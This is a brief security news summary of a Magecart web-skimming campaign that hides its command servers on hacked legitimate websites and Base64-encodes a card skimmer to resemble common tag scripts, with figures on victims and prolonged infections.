In a recent discovery, cybersecurity experts have come across a new Magecart campaign that aims to steal sensitive PII and credit card data from e-commerce websites. Akamai has identified victims of different scales across North America, Latin America, and Europe.
This new campaign is unique in the way that threat actors establish their C2 infrastructure on seemingly legitimate websites, frequently exploiting well-known vulnerabilities to achieve this.
Diving into details
In the initial phase of their operation, the attackers identify vulnerable legitimate websites, which they then hack into. These compromised websites serve as their C2 servers.
- By leveraging reputable websites, the threat actors cleverly avoid detection and circumvent blocks, eliminating the need to establish their own infrastructure.
- Subsequently, the attackers proceed to inject a concise JavaScript snippet into their targeted e-commerce sites. This snippet retrieves the malicious code from the previously compromised websites.
Encryption for stealthiness
- To further enhance the stealthiness of their attack, the threat actors have employed Base64 encoding to obfuscate the credit card skimmer.
- This encoding technique not only conceals the URL of the host but also adopts a structure resembling that of well-known third-party services such as Google Tag Manager or Facebook Pixel.
Why this matters
- This campaign primarily focuses on targeting commerce organizations, and the magnitude of the attack is significant. Some victim organizations receive a monthly influx of hundreds of thousands of visitors.
- Consequently, this puts thousands, and potentially tens of thousands, of individuals at risk of having their credit card data and PII stolen.
- Web skimming attacks pose substantial harm to digital commerce organizations. The repercussions can be detrimental, leading to reputational damage and other adverse consequences.
Attacks get worse
- It's worth noting that numerous high-profile Magecart attacks go undetected for months, or even years.
- In 2022 alone, out of 9,290 digital commerce domains affected by Magecart attacks, a staggering 2,468 remained actively infected until the year's end, underscoring the formidable threat posed to commerce organizations.
The bottom line
This campaign serves as a reminder that web skimming remains an imminent security threat. Malicious actors constantly adapt their tactics to obfuscate their activities and make detection more arduous. Traditional static analysis tools fall short in combating web skimmers, as threat actors continuously modify their approaches and employ increasingly sophisticated techniques, making them adept at evading static analysis methods.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/shutterstock_155296784.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/e896_shutterstock_1695335857.jpg)
